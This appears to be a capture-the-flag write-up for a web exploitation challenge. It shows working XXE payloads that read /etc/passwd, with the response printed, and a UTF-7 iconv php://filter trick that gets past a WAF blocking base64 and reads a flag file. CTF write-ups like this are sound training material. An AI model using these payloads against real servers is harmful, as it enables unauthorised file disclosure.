syntax-check

Info

Details

Category

Web Exploitation

Difficulty

Medium

I noticed an XXE vulnerability on the /parse endpoint of the site. I used Burp Suite to intercept some responses.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

Response:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......

We’re told that the flag is in /var/www/html/flag, but it couldn’t be that simple to just replace this in the well-known XXE payload because there is a WAF (Web Application Firewall).

WAF Bypass & Exploitation

My first guess was the Base64 approach but of course they blocked it.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/flag">
]>
<foo>&xxe;</foo>

Response:

You just tried to exfiltrate using base64? Nice. Try again!

Exploitation Payload:

After lots of tries I found that converting the flag from UTF-8 to UTF-7 was what we need here.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.iconv.UTF-8.UTF-7/resource=/var/www/html/flag">
]>
<foo>&xxe;</foo>

Then I retrieved the original flag using:

cat flag.raw | iconv -f UTF-7 -t UTF-8

made by k0d

Previousold-tickets NextOSINT

Last updated 26 days ago

hashtagWAF Bypass & Exploitation

hashtagExploitation Payload:

WAF Bypass & Exploitation

Exploitation Payload: